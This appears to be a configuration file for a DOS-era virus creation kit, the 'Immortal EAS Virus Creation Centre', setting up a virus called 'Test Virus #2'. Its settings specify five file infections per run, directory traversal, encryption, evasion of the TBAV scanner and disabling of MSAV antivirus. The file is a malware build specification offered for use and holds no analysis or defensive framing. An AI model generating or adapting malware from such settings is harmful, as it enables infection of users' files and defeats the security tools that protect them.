; VirusName:    Test Virus #2
; Virus ID:     [T2]
; Author:       Hacking Hell (Immortal EAS)
; Author ID:    [HH]
; Produced by:  Immortal EAS Virus Creation Centre v0.19�
; Producer ID:  [IE-VCC v0.19�]
; Maximum but no activation routines

VirusName =  'Test Virus #2'       ; This is the Virus Name
VirusID =    '[T2]'                ; This is the Virus ID
AuthorName = 'Hacking Hell'        ; This is the Author
AuthorID =   '[HH]'                ; This is the Author ID
TargetFile = 'TEST_2.ASM'          ; This is the target assembly file
Infections = '5'                   ; 5 Infections per run

Traversal = 'YES'                  ; The virus is 'DotDot' traversal
Encrypted = 'YES'                  ; The virus is encrypted
Anti-Trace = '1'                   ; Anti-Trace level 1 (not protected)
Anti-TBAV = 'YES'                  ; Use anti-flag techniques
Anti-MSAV = 'YES'                  ; Take down MSAV
